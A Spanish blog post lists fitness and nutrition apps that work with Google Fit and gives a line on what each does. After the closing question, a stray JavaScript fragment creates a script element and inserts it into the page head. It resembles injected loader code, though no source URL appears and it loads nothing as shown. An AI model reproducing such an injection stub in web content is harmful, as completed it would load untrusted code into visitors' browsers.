Salud y belleza » Salud, ejercicios

Ponte en forma con tus aplicaciones y Google Fit

Sin Comentarios

Hace unos meses se estrenaba en los móviles Android una nueva plataforma de salud, Google Fit, que llega para monitorizar la actividad física y poderse conectar con tus aplicaciones deportivas. Ahora podrás hacer ejercicio con tu móvil libre en la mano y descubrir numerosas ventajas. Descubre las aplicaciones deportivas compatibles con Google Fit:

- VimoFit: una aplicación que hace de entrenador personal y nos crea rutinas de entrenamiento personalizadas con vídeos y más de 130 ejercicios diferentes.

aplicaciones-google-fit

- Instant Heart Rate: una app que mide y registra la frecuencia cardíaca con la cámara de fotos y el flash del terminal.

- FatSecret: una aplicación que cuenta el valor calórico y nutricional de lo que comemos para poder hacer un seguimiento diario de tu dieta.

- Fitness Buddy: 1700 Exercises: esta app cuenta con un entrenador personal que ofrece más de 1.700 ejercicios y más de 1000 vídeos. Solo está en inglés y es una app de pago.

- Noom Coach: esta aplicación recomienda hábitos alimenticios saludables para lograr nuestro peso ideal. Muestra trucos, sugerencias de nutrición, recetas… Ideal para perder peso.

- Runtastic: monitoriza tus actividades deportivas registrando tu ruta para ver la distancia, el tiempo, la velocidad, las calorías, el recorrido en el mapa…

- RunKeeper: también monitoriza las actividades deportivas al aire libre. Puedes v er la ruta, distancia, ritmo, promedio…

apps-google-fit

- Nike +Running: esta aplicación te permitirá hacer un seguimiento de las carreras, seguir programas de entrenamiento y competir con tus amigos en sus tablas de clasificación.

Si quieres ponerte en forma y ver tus progresos utiliza estas aplicaciones compatibles con Google Fit y podrás llevar una vida saludable y en movimiento.

¿Sueles hacer ejercicio con tu smartphone?

var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.